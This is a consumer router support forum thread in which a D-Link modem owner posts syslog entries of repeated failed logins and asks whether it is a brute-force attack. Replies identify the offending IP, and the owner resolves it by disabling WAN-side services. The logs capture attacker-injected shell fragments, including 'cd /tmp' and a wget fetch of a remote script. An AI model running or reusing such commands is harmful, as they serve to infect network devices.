• November 01, 2024, 09:22:15 PM
  • Welcome, Guest
Please login or register.

Login with username, password and session length
Advanced search  

News:

This Forum Beta is ONLY for registered owners of D-Link products in the USA for which we have created boards at this time.

Author Topic: Help: Is someone trying to brute force hack my router ?  (Read 6880 times)

pushpen

  • Level 1 Member
  • *
  • Posts: 2
Help: Is someone trying to brute force hack my router ?
« on: July 15, 2016, 01:19:15 PM »

I have got D-Link 2750U router. I log using username admin and a password.
My router log shows lots of entries like the following:
Is someone trying to brute force hack my router ?

------------------------------------------------------------------------------------------------------
[9007] User root login failed, because username or password is wrong
2016-07-16 00:07:47 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:08:26 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:09:04 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:10:10 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:11:23 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:13:02 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:14:09 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:15:24 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:15:51 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:16:20 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:16:47 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:17:03 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:17:10 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 00:17:18 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:17:26 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:17:33 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:17:41 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:17:48 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:17:55 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:18:03 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:18:10 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:18:18 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:18:26 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User guest login failed, because username or password is wrong
2016-07-16 00:18:33 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:18:41 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:18:55 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:03 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:10 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:18 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:26 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:33 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:41 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:19:48 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 00:19:56 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 00:20:03 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 00:20:11 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:20:19 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:20:26 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:20:34 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:21:58 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] Not found session 6e23fd4c, user login check failed
2016-07-16 00:26:11 [5] syslog: Accessor:[CPE] Method:[PPPoE] Para:[] Result:[9001] Wan Link was Disconnected
2016-07-16 00:26:11 [6] syslog: Accessor:[CPE] Method:[NotiInform] Para:[type=2] Result:[0]
2016-07-16 00:27:11 [6] syslog: Accessor:[CPE] Method:[NotiInform] Para:[type=2] Result:[0]
2016-07-16 00:27:11 [5] syslog: Accessor:[CPE] Method:[PPPoE] Para:[User=png ip=117.203.249.xxx] Result:[0] Wan Link was Connected
2016-07-16 00:30:51 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User cd /tmp || cd /var/run || cd / login failed, because username or password is wrong
2016-07-16 00:36:57 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:37:33 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:38:16 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:39:41 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:40:37 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:41:39 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 00:42:27 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 00:47:47 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User wget http://64.95.100.90/gbb.s login failed, because username or password is wrong
2016-07-16 00:47:53 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User wget http://64.95.100.90/gbb.s login failed, because username or password is wrong
2016-07-16 01:00:26 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:00:58 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:01:29 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:02:03 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:02:27 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] Not found session 28721922, user login check failed
2016-07-16 01:02:35 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:02:37 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[] User admin login success
2016-07-16 01:03:08 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:03:41 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:04:14 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:04:48 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:05:18 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:05:44 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:06:09 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:06:34 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:07:00 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:07:25 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:07:51 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:08:17 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[] User admin session timeout and auto logout
2016-07-16 01:08:17 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:08:42 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:09:08 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:09:33 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:09:59 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:10:24 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:10:50 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:11:15 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:11:41 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:12:06 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:12:32 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:12:58 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:13:23 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:13:49 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:14:14 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:14:40 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:15:06 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:15:31 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:15:57 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:16:23 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:16:49 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:17:15 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User admin login failed, because username or password is wrong
2016-07-16 01:17:42 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User support login failed, because username or password is wrong
2016-07-16 01:19:33 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:21:13 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:23:11 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:25:16 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:26:59 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:29:00 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:29:11 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:29:23 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:29:56 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:30:34 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:32:02 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:32:50 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:33:58 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:34:45 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:35:32 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:36:58 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:37:42 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:38:28 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:39:16 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
2016-07-16 01:40:36 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:42:11 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:42:44 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9007] User root login failed, because username or password is wrong
2016-07-16 01:43:32 [5] syslog: Accessor:[CPE] Method:[AUTH] Para:[] Result:[9004] User 11111111 login failed three times Continuously.
« Last Edit: July 16, 2016, 01:38:29 AM by pushpen »
Logged

FurryNutz

  • Poweruser
  •   ▲
    ▲ ▲
  • *****
  • Posts: 49923
  • D-Link Global Forum Moderator
    • Router Troubleshooting
Re: Help: Is someone trying to brute force hack my router ?
« Reply #1 on: July 15, 2016, 01:24:44 PM »

Link>Welcome!

  • What Hardware version is your modem? Look at the sticker under modem.
  • Link>What Firmware version is currently loaded? Found on the modems web page under status.
  • What region are you located?

Do you have the modems web page access for remote enabled?
http://64.95.100.90 I believe is the address attempting to gain access. Might see if your modem has any firewall or blocking features and block this address if possible. Might contact your ISP and heve them help you with this address.
Logged
Cable: 1Gb/50Mb>NetGear CM1200>DIR-882>HP 24pt Gb Switch. COVR-1202/2202/3902,DIR-2660/80,3xDGL-4500s,DIR-LX1870,857,835,827,815,890L,880L,868L,836L,810L,685,657,3x655s,645,628,601,DNR-202L,DNS-345,DCS-933L,936L,960L and 8000LH.

RYAT3

  • Level 10 Member
  • *****
  • Posts: 2254
Re: Help: Is someone trying to brute force hack my router ?
« Reply #2 on: July 15, 2016, 02:37:47 PM »


That one address is black listed.

You should block that.



http://anti-hacker-alliance.com/index.php?ip=117.203.249.182

Logged

pushpen

  • Level 1 Member
  • *
  • Posts: 2
Re: Help: Is someone trying to brute force hack my router ?
« Reply #3 on: July 16, 2016, 05:13:53 AM »

I found a solution to my issue.
If somebody else is having the same issue.
Login to d-link router.
Then select 'Management' Tab.
Then select 'Access Controls" -> "Services" .
Select  your WAN interface like in my case it was PVC:0/35 and then un check all services.
Do not modify your LAN interface.
Click on apply.

This should stop all brute force attacks on your router.
Logged

FurryNutz

  • Poweruser
  •   ▲
    ▲ ▲
  • *****
  • Posts: 49923
  • D-Link Global Forum Moderator
    • Router Troubleshooting
Re: Help: Is someone trying to brute force hack my router ? (RESOLVED)
« Reply #4 on: July 16, 2016, 12:23:28 PM »

Glad you found the solution. Thanks for posting the info. Hope it helps future users.
Enjoy.  ;)
Logged
Cable: 1Gb/50Mb>NetGear CM1200>DIR-882>HP 24pt Gb Switch. COVR-1202/2202/3902,DIR-2660/80,3xDGL-4500s,DIR-LX1870,857,835,827,815,890L,880L,868L,836L,810L,685,657,3x655s,645,628,601,DNR-202L,DNS-345,DCS-933L,936L,960L and 8000LH.

RYAT3

  • Level 10 Member
  • *****
  • Posts: 2254
Re: Help: Is someone trying to brute force hack my router ?
« Reply #5 on: July 16, 2016, 03:09:07 PM »


It sounds like he turned off all outside access?

That's one way to handle it I guess.
Logged

FurryNutz

  • Poweruser
  •   ▲
    ▲ ▲
  • *****
  • Posts: 49923
  • D-Link Global Forum Moderator
    • Router Troubleshooting
Re: Help: Is someone trying to brute force hack my router ?
« Reply #6 on: July 16, 2016, 03:11:29 PM »

I guess so. Modems differ in there UI and features from DIR series routers.  ::)
Logged
Cable: 1Gb/50Mb>NetGear CM1200>DIR-882>HP 24pt Gb Switch. COVR-1202/2202/3902,DIR-2660/80,3xDGL-4500s,DIR-LX1870,857,835,827,815,890L,880L,868L,836L,810L,685,657,3x655s,645,628,601,DNR-202L,DNS-345,DCS-933L,936L,960L and 8000LH.